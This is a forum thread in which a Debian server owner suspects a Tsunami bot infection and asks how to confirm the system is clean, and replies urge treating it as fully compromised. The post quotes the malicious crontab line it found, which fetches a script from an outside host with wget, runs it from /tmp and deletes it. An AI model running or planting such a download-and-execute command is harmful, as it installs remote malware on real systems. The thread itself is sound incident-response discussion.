suspected victim of Tsunami exploit
since my server acted "weird" lately (pulling high bandwith during my nighttimes in spikes, then automatically stopping for the past few days) I inspected the server and found a crontab which pulled regular.bot from stablehost.us
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
A quick google search led me to the following CentOs (I'm running Debian) forum page:
Looking through my device in /tmp there are no scripts which shouldn't belong as far as I can see:
root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt 6 root root 4.0K Jan 4 13:45 .
drwxr-xr-x 24 root root 4.0K Jan 4 05:14 ..
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt 2 root root 4.0K Dec 23 23:39 .X11-unix
-rw-r--r-- 1 root root 0 Jan 4 13:16 .sh
drwxr-xr-x 2 root root 4.0K Dec 23 23:39 .webmin
Anyone able to provide more info with a means to make sure the system is clean ?
I know the best course of action would be to scrap the server and start over. This is scheduled but I currently don't yet have the time for it so if I could make sure it's not a threat at this minute, I could build the new machine on the scheduled time.
Regards,
2 Replies
I haven't looked at this particular script to see if it uses any other tricks to hide itself, but you need to consider the entire system as being compromised - what are the chances that only one malicious actor found an exploit?
Search all your logs, command histories, etc. Search for all new files on your server and examine them to make sure they are not backdoors.